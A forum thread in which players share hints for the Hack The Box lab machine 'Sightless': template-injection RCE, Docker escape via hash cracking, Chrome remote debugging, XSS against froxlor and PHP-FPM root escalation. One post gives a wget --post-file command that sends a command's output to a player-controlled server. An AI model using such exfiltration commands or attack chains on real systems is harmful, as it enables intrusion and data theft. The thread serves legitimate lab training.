Sightless Discussion [HINTS] [HTB]

Let’s talk about Sightless. Please do not share any flags or writeups.

1. Initial Foothold

Examine the vulnerability at this link: Huntr Bounty 46630727

2. Docker Escape

Crack specific hashes to escape the Docker container.

3. Enumeration

Inspect local processes and port listenings and notice Chrome-Remote-Debugging. By exploiting it, get admin credentials for the froxlor service.

4. Getting Root

Once you loggeed into the froxlor dashboard, you can execute commands as root by playing with PHP-FPM settings.

These are general hints for the challenge. To not spoil the fun, I did not include exact commands or steps to solve the challenge. If you need more specific hints, feel free to ask.

• sqlpad template injection to rce to get access on docker
• Crack hash for user found in shadow file
• admin.sightless.htb running on 8080
• Portforward to access the vhost
• Intended (xss to get credentials)
• (Unintended) use metasploit chrome debugger to read /home/John/automation/administration.py for credentials
• (Again unintended) Portforward all the larger ports, chrome debugging and check the network, if session is preserved you’ll get the credentials
• For root; reset ftp creds, login and find database.kbd, crack the password and find ssh keys
• Or you can use php-fpm to read root.text or to get shell

This is more than enough.

@Hex feel free to remove if violates any rules

I’ve got the KeePass, and managed to open it. The entry in the backup isn’t working through… It isn’t a key; but it doesn’t work as a password.

Edit: nvm. I got it.

This they call an easy machine…

Will you rate it as an easy machine for the one having just basic knowledge of scanning using gobuster ffuf nmap

It is not Easy for a brand-new beginner.

And now the key doesn’t want to work… far out

Im try’in rce in database form but it was not successful, i took econnecrefused. Any hint?

I had a lot of trouble getting a shell from the form alone. Spin up a webserver that can accept POST requests; then you can
<CMD> > /path/to/file && wget --post-fie=/path/to/file http://<YOUR SERVER>

That will eventually give you enough info to get user.

how do you guys discover the port for initial access - basic mysql port gets refused

you mean to get reverse shell?

yes, i’ve changed the command in the database form field to a rev shell with bin/bash but always get connection refused in the new connection tab

You are just providing detailed hints, so it’s not a problem unless you are sharing flags.

I am not sure if XSS for credentials is an intended path, because they literally created Chrome remote debuggers, which is not the default. You might be getting credentials via XSS because people who obtain credentials via Chrome debuggers trigger the XSS, leading to valid cookies.

Someone who has a private instance could verify this.

Actually you can use this:Blind XSS Leading to Froxlor Application Compromise · Advisory · froxlor/Froxlor · GitHub

With xss you can’t get the creds but you can create a new user.

It might be. Maybe these Chrome instances are for simulating XSS. Connecting to a remote Chrome instance was a unique experience tough.

new user registration is possible, I’ve tested it.

Hey how did you all got admin page in sightless , I tried gobuster subdomains vhost ffuf but couldn’t get any hits…

I have the same question

if you are confused about server and port, just start a listener or server locally and provide that address.